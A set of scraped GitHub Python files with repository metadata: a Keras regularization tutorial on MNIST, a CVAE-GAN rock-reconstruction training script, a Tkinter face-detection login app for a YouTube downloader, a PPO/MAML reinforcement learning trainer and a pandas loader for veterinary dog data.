kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer)
self.conv2 = ConvWithRegularizers(16, kernel_size=(5, 5),
kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer)
self.max_pool = MaxPooling2D(pool_size=(2, 2))
self.flatten = Flatten()
self.dense1 = Dense(120, activation='relu')
self.dense2 = Dense(84, activation='relu')
self.dense3 = Dense(num_classes, activation='softmax')
def call(self, x):
x = self.max_pool(self.conv1(x))
x = self.max_pool(self.conv2(x))
x = self.flatten(x)
x = self.dense3(self.dense2(self.dense1(x)))
return x
optimizer = tf.optimizers.SGD()
dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(batch_size)
log_string_template = 'Epoch {0:3}/{1}: main loss = {5}{2:5.3f}{6}; ' + \
'reg loss = {5}{3:5.3f}{6}; val acc = {5}{4:5.3f}%{6}'
def train_classifier_on_mnist(model, log_frequency=10):
avg_main_loss = tf.keras.metrics.Mean(name='avg_main_loss', dtype=tf.float32)
avg_reg_loss = tf.keras.metrics.Mean(name='avg_reg_loss', dtype=tf.float32)
print("Training: {}start{}".format(log_begin_red, log_end_format))
for epoch in range(epochs):
for (batch_images, batch_gts) in dataset: # For each batch of this epoch
with tf.GradientTape() as grad_tape:
y = model(batch_images)
main_loss = tf.losses.sparse_categorical_crossentropy(batch_gts, y)
reg_loss = sum(model.losses) # 모든 계층의 정규화 로스들 추가!
loss = main_loss + reg_loss
grads = grad_tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
avg_main_loss.update_state(main_loss)
avg_reg_loss.update_state(reg_loss)
if epoch % log_frequency == 0 or epoch == (epochs - 1): # Log some metrics
# Validate, computing the accuracy on test data:
acc = tf.reduce_mean(tf.metrics.sparse_categorical_accuracy(
tf.constant(y_test), model(x_test))).numpy() * 100
main_loss = avg_main_loss.result()
reg_loss = avg_reg_loss.result()
print(log_string_template.format(
epoch, epochs, main_loss, reg_loss, acc, log_begin_blue, log_end_format))
avg_main_loss.reset_states()
avg_reg_loss.reset_states()
print("Training: {}end{}".format(log_begin_green, log_end_format))
return model
# 정규화를 한거 안한거 비교를 해봅시다
model = LeNet5(10, kernel_regularizer=l2_reg(), bias_regularizer=l2_reg())
model = train_classifier_on_mnist(model, log_frequency=10)
model = LeNet5(10, kernel_regularizer=None, bias_regularizer=None)
model = train_classifier_on_mnist(model, log_frequency=50)
# 이제 이미 케라스에 준비되어 있는 정규화 방법을 써보자
def lenet(name='lenet', input_shape=input_shape,
use_dropout=False, use_batchnorm=False, regularizer=None):
layers = []
# 1st block:
layers += [Conv2D(6, kernel_size=(5, 5), padding='same',
input_shape=input_shape, kernel_regularizer=regularizer)]
if use_batchnorm:
layers += [BatchNormalization()]
layers += [Activation('relu'),
MaxPooling2D(pool_size=(2, 2))]
if use_dropout:
layers += [Dropout(0.25)]
# 2nd block:
layers += [
Conv2D(16, kernel_size=(5, 5), kernel_regularizer=regularizer)]
if use_batchnorm:
layers += [BatchNormalization()]
layers += [Activation('relu'),
MaxPooling2D(pool_size=(2, 2))]
if use_dropout:
layers += [Dropout(0.25)]
# Dense layers:
layers += [Flatten()]
layers += [Dense(120, kernel_regularizer=regularizer)]
if use_batchnorm:
layers += [BatchNormalization()]
layers += [Activation('relu')]
if use_dropout:
layers += [Dropout(0.25)]
layers += [Dense(84, kernel_regularizer=regularizer)]
layers += [Activation('relu')]
layers += [Dense(num_classes, activation='softmax')]
model = Sequential(layers, name=name)
return model
# 아래의 모든 정규화 특징을 알아두자
configurations = {
'none': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': None},
'l1': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': tf.keras.regularizers.l1(0.01)},
'l2': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': tf.keras.regularizers.l2(0.01)},
'dropout': {'use_dropout': True, 'use_batchnorm': False, 'regularizer': None},
'bn': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': None},
'l1_dropout': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': tf.keras.regularizers.l1(0.01)},
'l1_bn': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': tf.keras.regularizers.l1(0.01)},
'l1_dropout_bn': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': tf.keras.regularizers.l1(0.01)}
# ...
}
history_per_instance = dict()
print("Experiment: {0}start{1} (training logs = off)".format(log_begin_red, log_end_format))
for config_name in configurations:
# Resetting the seeds (for random number generation), to reduce the impact of randomness on the comparison:
tf.random.set_seed(random_seed)
np.random.seed(random_seed)
model = lenet("lenet_{}".format(config_name), **configurations[config_name])
model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# Launching the training (we set `verbose=0`, so the training won't generate any logs):
print("\t> Training with {0}: {1}start{2}".format(config_name, log_begin_red, log_end_format))
history = model.fit(x_train, y_train, batch_size=32, epochs=300, validation_data=(x_test, y_test), verbose=0)
history_per_instance[config_name] = history
print('\t> Training with {0}: {1}done{2}.'.format(config_name, log_begin_green, log_end_format))
print("Experiment: {0}done{1}".format(log_begin_green, log_end_format))
fig, ax = plt.subplots(2, 2, figsize=(10, 10),
sharex='col') # add parameter `sharey='row'` for a more direct comparison
ax[0, 0].set_title("loss")
ax[0, 1].set_title("val-loss")
ax[1, 0].set_title("accuracy")
ax[1, 1].set_title("val-accuracy")
lines, labels = [], []
for config_name in history_per_instance:
history = history_per_instance[config_name]
ax[0, 0].plot(history.history['loss'])
ax[0, 1].plot(history.history['val_loss'])
ax[1, 0].plot(history.history['accuracy'])
line = ax[1, 1].plot(history.history['val_accuracy'])
lines.append(line[0])
labels.append(config_name)
fig.legend(lines, labels, loc='center right', borderaxespad=0.1)
plt.subplots_adjust(right=0.84)
for config_name in history_per_instance:
best_val_acc = max(history_per_instance[config_name].history['val_accuracy']) * 100
print('Max val-accuracy for model "{}": {:2.2f}%'.format(config_name, best_val_acc))
| happiness6533/AI-study-project | supervised_learning/neural_network/regularizers.py | regularizers.py | py | 13,898 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras.datasets.mnist.load_data",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.nn.conv2d",
"line_number": 40,
"usage_type": "call"
},
{
... |
22557090121 | import torch
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
from tqdm import tqdm
from cvaegan.conditional_architecture import *
from cvaegan.utils import *
import porespy as ps
DATASET = torch.from_numpy(np.load('./data/bentheimer1000.npy')).reshape(1000,1,128,128,128)
POROSITY = torch.from_numpy(np.load('./data/bentheimer_conditional.npy')).float()
print(DATASET.shape)
print(POROSITY.shape)
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
DEVICE = torch.device('cuda')
#Specifiying folder location to save models per epoch
CHECKPOINT_GEN = "./checkpoints/generator/"
CHECKPOINT_CRITIC = "./checkpoints/critic/"
# Training hyperparameters
LEARNING_RATE = 1e-3
BATCH_SIZE = 4
Z_DIM = 16
LATENT = 512
NUM_EPOCHS = 1001
CRITIC_ITERATIONS = 4
GENERATOR_ITERATIONS = 1
LAMBDA_GP = 50
# initialize data loader
loader = DataLoader(MyLoader(DATASET, POROSITY), batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
seed_everything(seed=3407)
# initialize generator and critic
encoder = Encoder(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
encoder.train()
gen = Generator(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
gen.train()
critic = Discriminator(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
critic.train()
# initialize optimizerstride
opt_encoder = optim.Adam(encoder.parameters(), lr=LEARNING_RATE, betas=(0.9, 0.999))
scheduler_encoder = optim.lr_scheduler.CosineAnnealingLR(opt_encoder, 4 * NUM_EPOCHS * GENERATOR_ITERATIONS)
opt_gen = optim.Adam(gen.parameters(), lr=LEARNING_RATE, betas=(0.0, 0.9))
scheduler_gen = optim.lr_scheduler.CosineAnnealingLR(opt_gen, 4 * NUM_EPOCHS * GENERATOR_ITERATIONS)
opt_critic = optim.Adam(critic.parameters(), lr=LEARNING_RATE, betas=(0.0, 0.9))
scheduler_critic = optim.lr_scheduler.CosineAnnealingLR(opt_critic, 4 * NUM_EPOCHS * CRITIC_ITERATIONS)
# fixed noise for display
fixed_noise = noise = torch.randn(BATCH_SIZE,LATENT).to(DEVICE)
# Criterion for measuring porosity difference
criterion = torch.nn.L1Loss()
# Training
losses_encoder = []
losses_gen = []
losses_critic = []
for epoch in range(NUM_EPOCHS):
batches = tqdm(loader)
mean_loss_encoder = 0
mean_loss_gen = 0
mean_loss_critic = 0
for batch_idx, real_cond in enumerate(batches):
real = real_cond[0].float().unsqueeze(1).to(DEVICE)
cur_batch_size = real.shape[0]
c1 = real_cond[1].reshape(BATCH_SIZE,1).to(DEVICE)
for _ in range(CRITIC_ITERATIONS):
noise = torch.randn(cur_batch_size,LATENT).to(DEVICE)
fake = gen(noise, c1)
critic_real = critic(real, c1).reshape(-1)
critic_fake = critic(fake, c1).reshape(-1)
gp = gradient_penalty(critic, real, fake, c1, device=DEVICE)
loss_critic = torch.mean(critic_fake) - torch.mean(critic_real) + LAMBDA_GP * gp
critic.zero_grad()
loss_critic.backward()
opt_critic.step()
scheduler_critic.step()
# mean critic loss
mean_loss_critic += loss_critic.item()
for _ in range(GENERATOR_ITERATIONS):
# Update encoder network
z,mean,logvar = encoder(real,c1)
recon_data = gen(z,c1)
# Update G network
noise = torch.randn(cur_batch_size,LATENT).to(DEVICE)
noise_label = 0.3*torch.rand(cur_batch_size, 1).to(DEVICE)
fake = gen(noise, noise_label)
c3 = 1-torch.mean(torch.round(recon_data),dim=[2,3,4])
gen_fake = critic(fake, noise_label).reshape(-1)
loss_encoder = loss_function(recon_data,real,mean,logvar) + 1000 * criterion(c3,c1)
loss_gen = - torch.mean(gen_fake)
encoder.zero_grad()
gen.zero_grad()
loss_encoder.backward(retain_graph=True)
loss_gen.backward()
opt_encoder.step()
opt_gen.step()
scheduler_encoder.step()
scheduler_gen.step()
# mean vae loss
mean_loss_encoder += loss_encoder.item()
# mean generator loss
mean_loss_gen += loss_gen.item()
batches.set_postfix(
epoch=epoch,
encoder_loss=loss_encoder.item(),
gen_loss=loss_gen.item(),
critic_loss=loss_critic.item(),
)
if epoch % 5 == 0:
fig, ax = plt.subplots(2,3, figsize=(14,8))
rl = real[0][0].reshape(128,128,128).detach().cpu().numpy()
fk2 = np.round(gen(fixed_noise, c1)[0][0].reshape(128,128,128).detach().cpu().numpy())
ax[0][0].imshow(gen(fixed_noise, c1)[0,0,64,:,:].detach().cpu().numpy(), cmap='gray')
ax[1][0].imshow(rl[64,:,:], cmap='gray')
porreal = 1-np.mean(rl)
porfake2 = 1-np.mean(fk2)
ax[0][1].imshow(np.round(fk2[64,:,:]), cmap='gray')
ax[1][1].imshow(np.round(rl[64,:,:]), cmap='gray')
ax[1][1].set_title(f'real={porreal:.4f}')
ax[0][1].set_title(f'fake={porfake2:.4f}')
#Losses (generator and critic)
ax[0][2].plot(losses_gen, 'b',label='Generator', linewidth=2)
ax[0][2].plot(losses_critic, 'darkorange',label='Critic', linewidth=2)
ax[0][2].plot(losses_encoder, 'g',label='VAE', linewidth=2)
ax[0][2].legend()
ax[0][2].set_xlabel('Epochs')
ax[0][2].set_ylabel('Loss')
plt.savefig(f'./Rock/GenVAE_bentheimer_{epoch}.png')
# save losses at each epoch
losses_gen.append(mean_loss_gen / (batch_idx * GENERATOR_ITERATIONS))
losses_critic.append(mean_loss_critic / (batch_idx * CRITIC_ITERATIONS))
losses_encoder.append(mean_loss_encoder / (batch_idx * GENERATOR_ITERATIONS))
# Save checkpoints
#Uncomment the following to save checkpoints while training
if epoch % 5 == 0:
save_checkpoint(gen, opt_gen, path=CHECKPOINT_GEN + f"generatorVAE_bentheimer_{epoch}.pt")
save_checkpoint(critic, opt_critic, path=CHECKPOINT_CRITIC + f"critic_bentheimer_{epoch}.pt")
| pch-upc/reconstruction-cvaegan | train.py | train.py | py | 6,241 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.from_numpy",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_n... |
7373341985 | import cv2
import numpy as np
from tkinter import *
import tkinter.font
from tkinter import messagebox
from tkinter import filedialog
from pytube import YouTube
from PIL import ImageTk,Image
from bs4 import BeautifulSoup
from datetime import date
from googlesearch import search
import csv
import time, vlc
import pandas as pd
import requests
import urllib3
import sqlite3
import webbrowser
import speech_recognition as sr
import browse
import src
import speech
import database
import photoapp
cap = cv2.VideoCapture(0)
while (cap.isOpened()):
ret,frame = cap.read()
if ret ==True:
face_cascade = cv2.CascadeClassifier("opencvTutorial-main/files/haarcascade_frontalface_default.xml")
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),3)
cv2.imshow('Frame',frame)
if len(faces) !=0:
print("face detected")
cap.release()
cv2.destroyAllWindows()
root1 = Tk()
Desired_font = tkinter.font.Font( family = "Comic Sans MS",
size = 13,
weight = "bold")
root1.title("Login")
frame2 = LabelFrame(root1,bg='white')
frame2.grid(row=3,column=1,columnspan=4)
user = Label(frame2,text = "Enter Username",fg='black',bg='white',font = Desired_font)
pswd = Label(frame2,fg='black',bg='white',text="Enter Password",font = Desired_font)
user.grid(row=1,column=1,columnspan=2)
pswd.grid(row=2,column=1,columnspan=2)
e1 = Entry(frame2,width=35,borderwidth=2,font = Desired_font)
e1.grid(row =1,column=3,columnspan = 2,ipady=3)
e2 = Entry(frame2,width=35,borderwidth=2,font = Desired_font)
e2.grid(row =2,column=3,columnspan = 2,ipady=3)
log_button = Button(frame2,text="Login",fg='black',bg='white',font = Desired_font,command = lambda:login(e1.get(),e2.get()))
log_button.grid(row=3,column = 2,columnspan=2,ipadx=15)
global my_label
def login(user,pswd):
if user == "Akshay" and pswd == "admin":
# root1.destroy()
root = Toplevel(root1,bg='white')
root.title("Welcome to Akshay_youloder")
img1 = ImageTk.PhotoImage(Image.open("Downloads/yd_img2.png").resize((850, 450), Image.ANTIALIAS))
img2 = ImageTk.PhotoImage(Image.open("Pictures/2.jpg").resize((850, 450), Image.ANTIALIAS))
img3 = ImageTk.PhotoImage(Image.open("Pictures/3.jpg").resize((850, 450), Image.ANTIALIAS))
img4 = ImageTk.PhotoImage(Image.open("Pictures/4.jpg").resize((850, 450), Image.ANTIALIAS))
img5 = ImageTk.PhotoImage(Image.open("Pictures/5.jpg").resize((850, 450), Image.ANTIALIAS))
img_lst = [img1,img2,img3,img4,img5]
frame = LabelFrame(root,bg = 'white')
frame.grid(row=1,column=2,columnspan=2)
l3 = Label(root,text = "Enter Song name!!",bg='white',fg='black',font = Desired_font)
l3.grid(row=1,column=0,columnspan=2)
global my_label
my_label = Label(root,image=img1)
my_label.grid(row=0,column=0,columnspan=4)
prev = Button(frame,text="prev",fg='black',bg='white',borderwidth=2,padx=30,command =backward,font = Desired_font)
nex = Button(frame,text="next",fg='black',bg='white',borderwidth=2,padx=30,command=forward,font = Desired_font)
prev.grid(row=1,column=0)
nex.grid(row=1,column=2)
frame1 = LabelFrame(root,bg='white')
frame1.grid(row=2,column=2)
e = Entry(root,width=35,borderwidth=2,font = Desired_font)
e.grid(row =2,column=0,columnspan = 2,ipady=3)
D_button = Button(frame1,text="Download",fg='black',bg='white',font = Desired_font,command = lambda:Down(e.get()))
D_button.grid(row=1,column = 2,columnspan=1,ipadx=15)
Exit_button = Button(frame1,fg='black',bg='white',text="Exit",command=root.destroy,font = Desired_font)
Exit_button.grid(row=1,column =3,columnspan=1,ipadx=15)
sh_rec = Button(root,fg='black',bg='white',text="Show downloads",command = show,font = Desired_font)
sh_rec.grid(row=2,column = 3,columnspan=1,ipadx=15)
br = Button(root,text="Browse",command=browse,fg='black',bg='white',font = Desired_font)
br.grid(row=3,column=3,columnspan=1,ipadx=15)
mainloop()
if cv2.waitKey(1) & 0xFF == ord('$'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
| 07akshay/YouLoader | __init__.py | __init__.py | py | 5,073 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRA... |
74542668264 | import time
import numpy as np
import tensorflow as tf
import os.path as osp
from baselines import logger
from collections import deque
from baselines.common import explained_variance, set_global_seeds
from baselines.common.models import get_network_builder
import random
try:
from mpi4py import MPI
except ImportError:
MPI = None
from baselines.ppo2.runner import Runner
def constfn(val):
def f(_):
return val
return f
def learn(*, network, env, total_timesteps, tasks=None, task_names=None, eval_env = None, seed=None, nsteps=2048, ent_coef=0.0, lr=3e-4,
vf_coef=0.5, max_grad_norm=0.5, gamma=0.99, lam=0.95, maml_beta=0.1, task_batch=3,
log_interval=10, nminibatches=4, noptepochs=4, cliprange=0.2,
save_interval=0, load_path=None, model_fn=None, **network_kwargs):
'''
Learn policy using PPO algorithm (https://arxiv.org/abs/1707.06347)
Parameters:
----------
network: policy network architecture. Either string (mlp, lstm, lnlstm, cnn_lstm, cnn, cnn_small, conv_only - see baselines.common/models.py for full list)
specifying the standard network architecture, or a function that takes tensorflow tensor as input and returns
tuple (output_tensor, extra_feed) where output tensor is the last network layer output, extra_feed is None for feed-forward
neural nets, and extra_feed is a dictionary describing how to feed state into the network for recurrent neural nets.
See common/models.py/lstm for more details on using recurrent nets in policies
env: baselines.common.vec_env.VecEnv environment. Needs to be vectorized for parallel environment simulation.
The environments produced by gym.make can be wrapped using baselines.common.vec_env.DummyVecEnv class.
nsteps: int number of steps of the vectorized environment per update (i.e. batch size is nsteps * nenv where
nenv is number of environment copies simulated in parallel)
total_timesteps: int number of timesteps (i.e. number of actions taken in the environment)
ent_coef: float policy entropy coefficient in the optimization objective
lr: float or function learning rate, constant or a schedule function [0,1] -> R+ where 1 is beginning of the
training and 0 is the end of the training.
vf_coef: float value function loss coefficient in the optimization objective
max_grad_norm: float or None gradient norm clipping coefficient
gamma: float discounting factor
lam: float advantage estimation discounting factor (lambda in the paper)
log_interval: int number of timesteps between logging events
nminibatches: int number of training minibatches per update. For recurrent policies,
should be smaller or equal than number of environments run in parallel.
noptepochs: int number of training epochs per update
cliprange: float or function clipping range, constant or schedule function [0,1] -> R+ where 1 is beginning of the training
and 0 is the end of the training
save_interval: int number of timesteps between saving events
load_path: str path to load the model from
**network_kwargs: keyword arguments to the policy / network builder. See baselines.common/policies.py/build_policy and arguments to a particular type of network
For instance, 'mlp' network architecture has arguments num_hidden and num_layers.
'''
set_global_seeds(seed)
if isinstance(lr, float): lr = constfn(lr)
else: assert callable(lr)
if isinstance(cliprange, float): cliprange = constfn(cliprange)
else: assert callable(cliprange)
total_timesteps = int(total_timesteps)
optimizer = tf.keras.optimizers.Adam(learning_rate=maml_beta)
# Get the nb of env
nenvs = env.num_envs
ntasks = len(tasks)
# Get state_space and action_space
ob_space = env.observation_space
ac_space = env.action_space
if isinstance(network, str):
network_type = network
policy_network_fn = get_network_builder(network_type)(**network_kwargs)
network = policy_network_fn(ob_space.shape)
# Calculate the batch_size
nbatch = nenvs * nsteps
nbatch_train = nbatch // nminibatches
is_mpi_root = (MPI is None or MPI.COMM_WORLD.Get_rank() == 0)
# Instantiate the model object (that creates act_model and train_model)
if model_fn is None:
from baselines.ppo2.model import Model
model_fn = Model
model = model_fn(ac_space=ac_space, policy_network=network, ent_coef=ent_coef, vf_coef=vf_coef,
max_grad_norm=max_grad_norm)
if load_path is not None:
load_path = osp.expanduser(load_path)
ckpt = tf.train.Checkpoint(model=model)
manager = tf.train.CheckpointManager(ckpt, load_path, max_to_keep=None)
ckpt.restore(manager.latest_checkpoint)
# Instantiate the runner object
runners = [Runner(env=env, model=model, nsteps=nsteps, gamma=gamma, lam=lam, name=name) for env, name in zip(tasks, task_names)]
if eval_env is not None:
eval_runner = Runner(env = eval_env, model = model, nsteps = nsteps, gamma = gamma, lam= lam)
epinfobuf = deque(maxlen=100)
if eval_env is not None:
eval_epinfobuf = deque(maxlen=100)
# Start total timer
tfirststart = time.perf_counter()
total_episodes = 0
nupdates = total_timesteps//nbatch//task_batch
for update in range(1, nupdates+1):
assert nbatch % nminibatches == 0
# Start timer
tstart = time.perf_counter()
frac = 1.0 - (update - 1.0) / nupdates
# Calculate the learning rate
lrnow = lr(frac)
cliprangenow = cliprange(frac)
# this copies model parameters
old_params = [tf.Variable(x) for x in model.trainable_variables]
# randomly select tasks
sampled_tasks = random.sample(range(ntasks), task_batch)
meta_grads = []
for i in sampled_tasks:
runner = runners[i]
if update % log_interval == 0 and is_mpi_root: logger.info('Stepping environment...')
# Get minibatch
with tf.GradientTape() as tape:
obs, returns, masks, actions, values, neglogpacs, states, epinfos = runner.run() #pylint: disable=E0632
if eval_env is not None:
eval_obs, eval_returns, eval_masks, eval_actions, eval_values, eval_neglogpacs, eval_states, eval_epinfos = eval_runner.run() #pylint: disable=E0632
epinfobuf.extend(epinfos)
if eval_env is not None:
eval_epinfobuf.extend(eval_epinfos)
# Here what we're going to do is for each minibatch calculate the loss and append it.
mblossvals = []
# Index of each element of batch_size
# Create the indices array
inds = np.arange(nbatch)
for _ in range(noptepochs):
np.random.shuffle(inds)
# 0 to batch_size with batch_train_size step
for start in range(0, nbatch, nbatch_train):
end = start + nbatch_train
mbinds = inds[start:end]
slices = (tf.constant(arr[mbinds]) for arr in (obs, returns, masks, actions, values, neglogpacs))
pg_loss, vf_loss, entropy, approxkl, clipfrac, loss = model.train(lrnow, cliprangenow, *slices)
mblossvals.append([pg_loss, vf_loss, entropy, approxkl, clipfrac])
# collect some new trajectories with the updated policy but don't update policy
if update % log_interval == 0 and is_mpi_root: logger.info('Stepping environment with new policy...')
obs, returns, masks, actions, values, neglogpacs, states, epinfos = runner.run() #pylint: disable=E0632
# with tf.GradientTape() as tape:
losses = []
# with tf.GradientTape() as tape:
inds = np.arange(nbatch)
for _ in range(1):
# Randomize the indexes
np.random.shuffle(inds)
for start in range(0, nbatch, nbatch_train):
end = start + nbatch_train
mbinds = inds[start:end]
slices = (tf.constant(arr[mbinds]) for arr in (obs, returns, masks, actions, values, neglogpacs))
losses.append(model.get_loss(cliprangenow, *slices))
# reset model
meta_loss = tf.reduce_mean(losses)
meta_grads.append(tape.gradient(meta_loss, model.trainable_variables))
set_weights(model, old_params)
# Feedforward --> get losses --> update
lossvals = np.mean(mblossvals, axis=0)
meta_grad = mean(meta_grads)
meta_grad, _ = tf.clip_by_global_norm(meta_grad, 0.5)
# meta_grad = tape.gradient(meta_loss, model.trainable_variables)
grads_and_vars = zip(meta_grad, model.trainable_variables)
optimizer.apply_gradients(grads_and_vars)
# End timer
tnow = time.perf_counter()
# Calculate the fps (frame per second)
fps = int(nbatch * task_batch / (tnow - tstart))
if update % log_interval == 0 or update == 1:
# Calculates if value function is a good predicator of the returns (ev > 1)
# or if it's just worse than predicting nothing (ev =< 0)
total_rews = 0
episodes = 0
recent_eps = 0
ev = explained_variance(values, returns)
logger.logkv("misc/serial_timesteps", update*nsteps)
logger.logkv("misc/nupdates", update)
logger.logkv("misc/total_timesteps", update*nbatch*task_batch)
logger.logkv("fps", fps)
logger.logkv("misc/explained_variance", float(ev))
logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))
logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))
for i in range(ntasks):
episodes += len(runners[i].eprew)
recent_rews = runners[i].eprew[-100:]
recent_eps += len(recent_rews)
total_rews += sum(recent_rews)
total_episodes += episodes
logger.logkv('total_episodes', total_episodes) # Total of all episodes thus far
logger.logkv('mean_ep_rewards', safediv(total_rews, recent_eps)) # Running average reward of last 100 episodes for the sampled tasks
logger.logkv('total_episodes_per_game', total_episodes/ntasks) # Mean reward of last 100 episodes
if len(runner.eprew):
logger.logkv('last_ep_rewards', runner.eprew[-1])
else:
logger.logkv('lasteprew', None)
if eval_env is not None:
logger.logkv('eval_eprewmean', safemean([epinfo['r'] for epinfo in eval_epinfobuf]) )
logger.logkv('eval_eplenmean', safemean([epinfo['l'] for epinfo in eval_epinfobuf]) )
logger.logkv('misc/time_elapsed', tnow - tfirststart)
for (lossval, lossname) in zip(lossvals, model.loss_names):
logger.logkv('loss/' + lossname, lossval)
logger.dumpkvs()
return model
# Avoid division error when calculate the mean (in our case if epinfo is empty returns np.nan, not return an error)
def safemean(xs):
return np.nan if len(xs) == 0 else np.mean(xs)
def safediv(xs, denom):
return np.nan if denom == 0 else xs / denom
def mean(var_list):
avg_vars = []
for vars in zip(*var_list):
avg_vars.append(tf.reduce_mean(vars, axis=0))
return avg_vars
def add_vars(var_list):
avg_vars = []
for vars in zip(*var_list):
avg_vars.append(tf.reduce_sum(vars, axis=0))
return avg_vars
def set_weights(model, var_list):
trainables = model.trainable_variables
for var, model_var in zip(var_list, trainables):
model_var.assign(var)
def copy_params(model):
return [tf.Variable(x) for x in model.trainable_variables] | asaiacai/cs285-final-project | baselines/baselines/ppo2/ppo2.py | ppo2.py | py | 12,780 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mpi4py.MPI",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "baselines.common.set_global_seeds",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.optimizers.Adam",
"line_number": 88,
"usage_type": "call"
},
{
"api... |
74532513383 | import time
import pandas as pd
import numpy as np
from os.path import dirname
from . import converters;
from sklearn.datasets.base import Bunch
#Load dataframe
def load_df_dogs_2016(NApolicy = 'none', dropColumns = [], fixErrors = True, fixAge=True, censoringPolicy = 'none', newFeats = True):
module_path = dirname(__file__)
data = pd.read_excel(module_path + "/data/dogs.xlsx",
spreadsheet="2006-2016",
converters={"IP": converters.sieno_converter,
"Furosemide": converters.sieno_converter,
"Ache-i": converters.sieno_converter,
"Pimobendan": converters.sieno_converter,
"Spironolattone": converters.sieno_converter,
"Antiaritmico": converters.sieno_converter,
},
dtype={"Cartella": np.str,
"Gravità IP": np.int,
"Vrig Tric": np.float,
"Età": np.float,
"MORTE": np.float,
"MC": np.float,
"Data di nascita": np.str,
"Data 1° visita": np.str,
"Inizio Terapia": np.str,
"Data morte ": np.str,
"SURVIVAL TIME": np.int,
"Terapia": np.int,
"isachc": np.str,
"CLASSE": np.str,
"Peso (Kg)": np.float,
"Asx/Ao": np.float,
"E": np.float,
"E/A": np.float,
"FE %": np.float,
"FS%": np.float,
"EDVI": np.float,
"ESVI": np.float,
"Allo diast": np.float,
"Allo sist": np.float
}
)
data.rename(columns={"Cartella": "Folder",
"Gravità IP": "IP Gravity",
"Data di nascita": "Birth date",
"Data 1° visita": "First visit",
"Età": "Age",
"Inizio Terapia": "Therapy started",
"MORTE": "Dead",
"Data morte ": "Date of death",
"SURVIVAL TIME": "Survival time",
"Terapia": "Therapy Category",
"CLASSE": "Class",
"Peso (Kg)": "Weight (Kg)",
"FS%": "FS %"
}, inplace=True)
timeCols = ["Birth date", "First visit", "Therapy started", "Date of death"]
#Use the same date format
for attr in timeCols:
data[attr] = data[attr].apply(lambda x: converters.date_converter(x))
for i, row in data.iterrows():
row = data.loc[i, :]
if fixErrors:
#Fix incorrect survival time
if (row["Date of death"] - row["First visit"]).days != row["Survival time"]:
data.at[i, "Survival time"] = (row["Date of death"] - row["First visit"]).days
if newFeats:
#Adding new column "Therapy to visit", a time delta in days
data["Therapy to visit"] = (data["First visit"] - data["Therapy started"]).apply(lambda x: x.days)
if fixAge:
#Fixing Age attribute to be consistently equal to "First visit" - "Birth date"
data["Age"] = (data["First visit"] - data["Birth date"]).apply(lambda x: x.days/365)
for attr in timeCols:
data[attr] = data[attr].apply(lambda x: time.mktime(x.timetuple()))
#Censoring policies
#drop censored rows
if censoringPolicy=='drop':
data.drop(data[data["Dead"]==0].index, inplace=True)
#substitute survtime with max survtime of dead subjects
elif censoringPolicy=='max':
survmax = data["Survival time"][data["Dead"]==1].max()
for i, row in data.iterrows():
if row["Dead"]==0:
data.at[i, "Survival time"] = survmax
#Delete useless columns
data.drop(dropColumns, axis="columns", inplace=True)
#NA policies
#drop
if NApolicy=='drop':
data.dropna(axis=0, how='any', inplace=True)
#Fill NA with mean value of feature
elif NApolicy=='mean':
means = {nacol:data[nacol].mean() for nacol in data.columns[data.isnull().any()].tolist()}
data.fillna(value=means, inplace=True)
#Fill NA with generated normal values
elif NApolicy=='normal':
params = {nacol:(data[nacol].mean(),data[nacol].std()) for nacol in data.columns[data.isnull().any()].tolist()}
for i, row in data.iterrows():
for nacol in params.keys():
if pd.isnull(row[nacol]):
data.at[i, nacol] = np.random.normal(loc=params[nacol][0], scale=params[nacol][1])
return data
#default drop columns
dropNonNumeric = ["Folder", "isachc", "Class"]
dropIrrelevant = ["IP", "Furosemide", "Ache-i", "Pimobendan", "Spironolattone"]
dropDead = ["Dead", "MC"]
dropDates = ["Birth date", "First visit", "Therapy started", "Date of death"]
#load sklearn Bunch object with Survival time as target
